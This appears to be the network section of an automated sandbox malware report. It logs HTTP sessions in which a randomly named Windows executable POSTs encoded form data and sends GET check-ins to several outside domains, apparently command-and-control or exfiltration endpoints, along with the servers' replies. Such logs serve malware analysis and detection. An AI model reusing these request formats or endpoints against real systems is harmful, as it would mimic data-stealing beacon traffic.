                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  3           192.168.2.8  49717        107.155.56.30   80                5240  C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                  Dec 12, 2024 21:38:32.126044035 CET  1847               OUT        POST /2gcl/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.expancz.top
                                                                  Origin: http://www.expancz.top
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.expancz.top/2gcl/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Ascii: 84EhVDY=[TRUNCATED]
                                                                  Dec 12, 2024 21:38:33.693423033 CET  697                IN         HTTP/1.1 405 Not Allowed
                                                                  Server: nginx
                                                                  Date: Thu, 12 Dec 2024 20:38:33 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 552
                                                                  Connection: close
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  4           192.168.2.8  49718        107.155.56.30   80                5240  C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                  Dec 12, 2024 21:38:34.777084112 CET  560                OUT        GET /2gcl/?84EhVDY=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmW5Tm5D5tQBI3B1+VDfuWeAsbbOCckpfS6ddEbXQs3erVRA==&Y6Bh=0jQHfl_Xbv0D_JU HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.expancz.top
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Dec 12, 2024 21:38:36.355451107 CET  1236               IN         HTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Thu, 12 Dec 2024 20:38:36 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 9651
                                                                  Last-Modified: Fri, 15 Nov 2024 02:47:44 GMT
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  ETag: "6736b650-25b3"
                                                                  Accept-Ranges: bytes
                                                                  Data Ascii: <!DOCTYPE html><html><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no"><meta name=keywords content=""><meta name=description content=""><meta property=og:type content=website><meta property=og:title content=""><meta property=og:description content=""><meta property=og:url content=""><meta property=og:image content=""><meta name=HandheldFriendly content=true><meta name=apple-mobile-web-app-capable content=yes><meta name=apple-mobile-web-app-status-bar-style content=black><meta name=format-detection content="telphone=no, email=no"><meta name=screen-orientation content=portrait><meta name=x5-orientation content=portrait><meta name=full-screen content=yes><meta name=x5-fullscreen content=true><meta name=browsermode content=application><meta name=x5-page-mode content=app><meta name=msapplication-tap-highlight content=no><meta http-equiv=X-UA-Compatible content="ie=edge"><link href=https:
                                                                  Dec 12, 2024 21:38:36.355465889 CET  1236               IN
                                                                  Data Ascii: //l3filejson4dvd.josyliving.com/favicon.ico type=image/x-icon rel=icon><style>#POP800_INIT_DIV { display: none!important; } #POP800_PANEL_DIV { display: none!important; } #POP800_LEAVEWORD_DIV { display: none!
                                                                  Dec 12, 2024 21:38:36.357352972 CET  1236               IN
                                                                  Data Ascii: xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); } }else if(window.XMLHttpRequest){ //FirefoxOpera 8.0+SafariChrome xmlHttp = new XMLHttpRequest(); } /
                                                                  Dec 12, 2024 21:38:36.357367039 CET  672                IN
                                                                  Data Ascii: myBody.appendChild(myScript); return true; }else{ return false; } }else{ return false; } } var pathInfo = ''; var baseJsUrl = isAtm ? 'https://dq0ib5xlct7tw.cloudfron
                                                                  Dec 12, 2024 21:38:36.359385967 CET  1236               IN
                                                                  Data Ascii: yahooSource: '3', tikTokSource: '4' }; // // function checkSource(data, ch) { return Object.keys(data).map(function (key) { return data[key] }).indexOf(ch)
                                                                  Dec 12, 2024 21:38:36.359400034 CET  1236               IN
                                                                  Data Ascii: t.async = !0; t.src = v; s = b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t, s) }(window, document, 'script', 'https://connect.facebook.net/en_US/fbevents.js'); fbq('dataProcessi
                                                                  Dec 12, 2024 21:38:36.359410048 CET  1236               IN
                                                                  Data Ascii: = 0; n < ttq.methods.length; n++) ttq.setAndDefer(e, ttq.methods[ n]); return e }, ttq.load = function(e, n) { var i = "https://analytics.tiktok.com/i18n/pixel/events.js"; ttq._i = ttq._i
                                                                  Dec 12, 2024 21:38:36.361515999 CET  1236               IN
                                                                  Data Ascii: aLayer.push(arguments);} gtag('js', new Date()); gtag('config', google_id || 'G-CC0LH72W84'); console.log('google PageView');</script><script type=application/javascript>if(localStorage.source === sourceData.yahooSource) { (f
                                                                  Dec 12, 2024 21:38:36.361530066 CET  578                IN
                                                                  Data Ascii: = now; }, false); // // // document.addEventListener('gesturestart', function (event) { // event.preventDefault(); // }); }</script><link href=/static/css/app.8625cfbde75fd1ee0a0c2bb00d896


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  5           192.168.2.8  49719        18.139.62.226   80                5240  C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                  Dec 12, 2024 21:38:42.772784948 CET  837                OUT        POST /y49d/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.taxiquynhonnew.click
                                                                  Origin: http://www.taxiquynhonnew.click
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.taxiquynhonnew.click/y49d/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Ascii: 84EhVDY=r4rKcibVSx4vBQRZBwBaNoLvbBNGhs+G/PHzvokdAncuO7K4XAXhJXpnz63f//TzIM4SVG09rhp4coRzSgDjen+Cj1O8jeUc2ciuXrdeaVTYwroIx9J5S+2qdSqUfBtYdv3W8RrYUQWV6Mg7QYIYgUywznvmG9dQlUa69rP8fQ9fDi0Sh+T7hOgvQLhizV8Ks1x4A5g=
                                                                  Dec 12, 2024 21:38:44.289469004 CET  371                IN         HTTP/1.1 301 Moved Permanently
                                                                  Server: openresty
                                                                  Date: Thu, 12 Dec 2024 20:38:44 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 166
                                                                  Connection: close
                                                                  Location: https://www.taxiquynhonnew.click/y49d/
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  6           192.168.2.8  49720        18.139.62.226   80                5240  C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                  Dec 12, 2024 21:38:45.451946974 CET  857                OUT        POST /y49d/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.taxiquynhonnew.click
                                                                  Origin: http://www.taxiquynhonnew.click
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.taxiquynhonnew.click/y49d/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 72 34 72 4b 63 69 62 56 53 78 34 76 54 67 42 5a 4e 7a 70 61 4b 49 4c 73 56 68 4e 47 72 4d 2b 4b 2f 50 4c 7a 76 71 49 4e 41 78 30 75 4f 5a 69 34 4e 45 44 68 48 33 70 6e 6e 71 33 57 69 76 54 36 49 4d 30 6b 56 45 77 39 72 68 39 34 63 74 31 7a 56 53 72 69 65 33 2b 45 71 56 4f 2b 38 4f 55 63 32 63 69 75 58 72 4a 34 61 52 2f 59 77 62 34 49 78 59 39 2b 4d 4f 32 72 51 43 71 55 62 42 74 63 64 76 33 30 38 55 7a 68 55 54 2b 56 36 4d 77 37 65 70 49 62 7a 30 79 32 39 48 76 74 49 66 38 2f 6f 33 53 72 31 36 54 43 57 53 39 56 47 55 46 34 37 63 62 39 69 4f 49 45 51 49 4a 55 32 69 68 69 32 57 68 49 65 75 31 63 38 57 70 59 52 4b 39 47 6c 78 76 55 70 2b 30 4a 56 41 57 66
                                                                  Data Ascii: 84EhVDY=r4rKcibVSx4vTgBZNzpaKILsVhNGrM+K/PLzvqINAx0uOZi4NEDhH3pnnq3WivT6IM0kVEw9rh94ct1zVSrie3+EqVO+8OUc2ciuXrJ4aR/Ywb4IxY9+MO2rQCqUbBtcdv308UzhUT+V6Mw7epIbz0y29HvtIf8/o3Sr16TCWS9VGUF47cb9iOIEQIJU2ihi2WhIeu1c8WpYRK9GlxvUp+0JVAWf
                                                                  Dec 12, 2024 21:38:47.046320915 CET | 371 | IN | HTTP/1.1 301 Moved Permanently
                                                                  Server: openresty
                                                                  Date: Thu, 12 Dec 2024 20:38:46 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 166
                                                                  Connection: close
                                                                  Location: https://www.taxiquynhonnew.click/y49d/
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  7 | 192.168.2.8 | 49721 | 18.139.62.226 | 80 | 5240 | C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 12, 2024 21:38:48.111126900 CET | 1874 | OUT | POST /y49d/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.taxiquynhonnew.click
                                                                  Origin: http://www.taxiquynhonnew.click
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.taxiquynhonnew.click/y49d/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 72 34 72 4b 63 69 62 56 53 78 34 76 54 67 42 5a 4e 7a 70 61 4b 49 4c 73 56 68 4e 47 72 4d 2b 4b 2f 50 4c 7a 76 71 49 4e 41 78 4d 75 50 71 61 34 4f 6c 44 68 47 33 70 6e 37 61 33 62 69 76 53 36 49 4d 74 74 56 45 73 44 72 6b 35 34 65 4c 70 7a 51 6a 72 69 56 33 2b 45 6f 56 4f 2f 6a 65 56 59 32 59 4f 51 58 72 5a 34 61 52 2f 59 77 64 38 49 33 4e 4a 2b 4f 4f 32 71 64 53 71 49 66 42 73 42 64 76 76 4f 38 56 48 75 55 6a 65 56 39 74 41 37 54 2f 63 62 70 30 79 30 74 58 75 74 49 66 77 67 6f 32 2f 61 31 36 33 6f 57 51 74 56 47 54 70 6a 68 49 65 2b 78 64 6b 36 5a 2b 78 41 31 44 4a 63 2b 47 64 75 54 65 70 34 7a 78 51 31 51 61 30 4b 68 78 69 4c 71 61 6b 45 53 6b 7a 63 72 34 37 53 70 76 79 41 30 4a 45 6e 71 4e 2f 6a 78 47 66 73 41 35 58 39 38 5a 51 75 4e 72 6f 4f 76 6d 37 31 45 50 4e 55 43 77 52 34 71 63 4a 74 4a 30 2f 69 37 68 34 32 46 43 42 4e 74 7a 54 63 78 2f 58 77 70 70 79 52 76 4c 61 66 74 65 59 65 70 69 6a 50 65 68 36 39 53 66 75 36 6d 42 6e 37 43 34 70 58 73 54 79 74 50 4f 70 78 57 36 [TRUNCATED]
                                                                  Data Ascii: 84EhVDY=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 [TRUNCATED]
                                                                  Dec 12, 2024 21:38:49.687383890 CET | 371 | IN | HTTP/1.1 301 Moved Permanently
                                                                  Server: openresty
                                                                  Date: Thu, 12 Dec 2024 20:38:49 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 166
                                                                  Connection: close
                                                                  Location: https://www.taxiquynhonnew.click/y49d/
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  8 | 192.168.2.8 | 49722 | 18.139.62.226 | 80 | 5240 | C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 12, 2024 21:38:50.776324034 CET | 569 | OUT | GET /y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMXj+Nm1qvgbEutIi/VJ05VR66+PohupJRL8TdRX6oU1EEMw==&Y6Bh=0jQHfl_Xbv0D_JU HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.taxiquynhonnew.click
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Dec 12, 2024 21:38:52.356918097 CET | 533 | IN | HTTP/1.1 301 Moved Permanently
                                                                  Server: openresty
                                                                  Date: Thu, 12 Dec 2024 20:38:52 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 166
                                                                  Connection: close
                                                                  Location: https://www.taxiquynhonnew.click/y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMXj+Nm1qvgbEutIi/VJ05VR66+PohupJRL8TdRX6oU1EEMw==&Y6Bh=0jQHfl_Xbv0D_JU
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  9 | 192.168.2.8 | 49723 | 209.74.77.107 | 80 | 5240 | C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 12, 2024 21:39:06.182305098 CET | 825 | OUT | POST /a6qk/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.learnwithus.site
                                                                  Origin: http://www.learnwithus.site
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.learnwithus.site/a6qk/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 58 47 30 2b 61 72 68 6c 57 7a 44 6a 4d 68 48 2b 71 62 79 76 65 59 56 66 75 31 6d 4f 62 52 71 61 4c 66 30 63 6f 59 65 69 72 51 78 68 50 47 59 51 41 6e 35 36 70 2b 49 4a 53 55 5a 41 75 6a 30 61 77 49 6a 6d 4d 50 39 76 7a 46 30 52 48 6d 56 30 31 32 6a 77 64 64 77 37 65 49 2b 71 71 67 2b 47 57 70 55 77 62 39 37 36 76 64 4d 6f 48 2f 69 43 65 38 59 4b 4e 70 59 33 47 34 73 35 41 43 5a 64 45 67 2f 62 78 30 4a 35 6a 35 50 61 4c 58 62 6d 67 4f 59 63 50 4f 63 58 4e 44 69 34 51 38 4a 7a 78 30 41 39 69 47 43 65 47 66 2f 6c 73 61 34 4a 6a 49 2f 4d 2f 57 6c 30 57 69 34 53 6b 44 66 63 53 57 6b 47 49 6f 51 3d
                                                                  Data Ascii: 84EhVDY=XG0+arhlWzDjMhH+qbyveYVfu1mObRqaLf0coYeirQxhPGYQAn56p+IJSUZAuj0awIjmMP9vzF0RHmV012jwddw7eI+qqg+GWpUwb976vdMoH/iCe8YKNpY3G4s5ACZdEg/bx0J5j5PaLXbmgOYcPOcXNDi4Q8Jzx0A9iGCeGf/lsa4JjI/M/Wl0Wi4SkDfcSWkGIoQ=
                                                                  Dec 12, 2024 21:39:07.390558004 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Thu, 12 Dec 2024 20:39:07 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  10 | 192.168.2.8 | 49724 | 209.74.77.107 | 80 | 5240 | C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 12, 2024 21:39:08.845956087 CET | 845 | OUT | POST /a6qk/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.learnwithus.site
                                                                  Origin: http://www.learnwithus.site
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.learnwithus.site/a6qk/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 58 47 30 2b 61 72 68 6c 57 7a 44 6a 50 42 33 2b 6f 38 65 76 56 59 56 59 72 31 6d 4f 41 42 71 65 4c 66 34 63 6f 64 2b 79 72 69 56 68 50 6e 49 51 42 6d 35 36 6f 2b 49 4a 47 45 5a 46 68 44 30 76 77 49 6e 55 4d 4f 52 76 7a 45 51 52 48 6a 52 30 31 46 4c 7a 48 74 77 35 4c 59 2b 6b 75 67 2b 47 57 70 55 77 62 39 48 63 76 64 55 6f 48 50 79 43 64 64 59 46 45 4a 59 30 52 49 73 35 4c 69 59 61 45 67 2f 74 78 31 6c 44 6a 36 33 61 4c 57 72 6d 6c 50 59 66 46 4f 63 52 44 6a 6a 56 52 4f 6b 6d 7a 55 6f 74 6a 56 53 72 4e 2f 33 77 6b 4d 4a 6a 35 71 33 4b 38 57 4e 66 57 68 51 6b 68 30 43 30 49 31 30 32 57 2f 48 6e 2f 6d 59 6f 62 38 73 2f 46 43 4f 61 58 45 4f 56 56 4f 55 6a
                                                                  Data Ascii: 84EhVDY=XG0+arhlWzDjPB3+o8evVYVYr1mOABqeLf4cod+yriVhPnIQBm56o+IJGEZFhD0vwInUMORvzEQRHjR01FLzHtw5LY+kug+GWpUwb9HcvdUoHPyCddYFEJY0RIs5LiYaEg/tx1lDj63aLWrmlPYfFOcRDjjVROkmzUotjVSrN/3wkMJj5q3K8WNfWhQkh0C0I102W/Hn/mYob8s/FCOaXEOVVOUj
                                                                  Dec 12, 2024 21:39:10.051693916 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Thu, 12 Dec 2024 20:39:09 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
